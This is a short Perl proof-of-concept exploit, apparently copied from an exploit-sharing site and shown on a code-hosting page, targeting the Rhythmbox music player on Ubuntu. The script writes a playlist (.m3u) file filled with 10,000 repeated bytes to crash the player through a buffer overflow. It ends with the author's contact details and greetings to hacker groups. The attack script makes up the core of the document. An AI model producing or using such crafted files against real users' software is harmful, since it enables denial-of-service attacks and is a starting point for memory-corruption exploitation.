37 lines
No EOL
1.2 KiB
Perl
Executable file
37 lines
No EOL
1.2 KiB
Perl
Executable file
####
|
|
# Exploit Title: Rhythmbox (.m3u) Local Crash Poc
|
|
# Vendor: http://projects.gnome.org/rhythmbox/
|
|
# Author: Caddy-Dz
|
|
# Facebook Page: www.facebook.com/islam.caddy
|
|
# E-mail: islam_babia@hotmail.com | Caddy-Dz@exploit-id.com
|
|
# Website: www.exploit-id.com
|
|
# Category:: webapps
|
|
# Tested on: [Ubuntu 10.10 - French]
|
|
####
|
|
|
|
# Note ! : Rhythmbox Is Allready installed on Ubuntu
|
|
# Applications => Son et Vidéo => Lecteur de musique Rhythmbox
|
|
|
|
|
|
|
|
#!/usr/bin/perl
|
|
|
|
my $bof="\x41" x 10000;
|
|
open (FILE,">> Caddy-Dz.M3U");
|
|
print FILE $bof;
|
|
close (FILE);
|
|
|
|
|
|
####
|
|
|
|
[+] Peace From Algeria
|
|
|
|
####
|
|
|
|
=================================**Algerians Hackers**=======================================|
|
|
# Greets To : |
|
|
KedAns-Dz , Kalashinkov3 & **All Algerians Hackers** , jos_ali_joe , Z190T , |
|
|
All Exploit-Id Team , (exploit-id.com) , (1337day.com) , (09exploit.com) , |
|
|
All My Friends: T!riRou , ChoK0 , MeRdaw! , CaRras0 , StiffLer , MaaTar , St0fa , Nissou , |
|
|
RmZ ...others |
|
|
============================================================================================ | |